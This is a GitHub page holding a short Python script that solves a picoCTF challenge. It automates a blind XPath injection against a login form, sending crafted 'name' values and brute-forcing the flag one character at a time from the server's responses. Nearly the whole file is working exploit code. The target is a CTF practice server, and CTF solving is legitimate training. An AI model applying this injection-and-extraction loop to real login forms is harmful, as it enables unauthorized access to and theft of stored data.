-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathscript.py
More file actions
25 lines (21 loc) · 1.07 KB
/
script.py
File metadata and controls
25 lines (21 loc) · 1.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
import string
alphabet = string.printable #Set of all the ASCII characters & special characters.
#examplePostRequest = requests.post('http://mercury.picoctf.net:53735', data = {"name":"' or //*[starts-with(text(),'picoCTF{')] or 'x'='y", "pass":"notRealPass"})
#the starts-with() function allows us to search for the XML file ( //* ) for any strings starting with picoCTF{ which turns true. We can then
#brute force all the combinations to build up the eventual words
continued = True
successSubstring = "You're on the right path."
exploitedStart = "' or //*[starts-with(text(),'picoCTF{"
exploitedEnd = "')] or 'x'='y"
for i in range(0,20):
for char in alphabet:
exploitedString = exploitedStart + char + exploitedEnd
#print(exploitedString)
httpReq = requests.post('http://mercury.picoctf.net:53735', data = {"name":exploitedString, "pass":"noRealPass"})
if "You're on the right path." in httpReq.text:
exploitedStart += char
print(exploitedStart + " succeded")
break
else:
print(exploitedStart + char +" failed")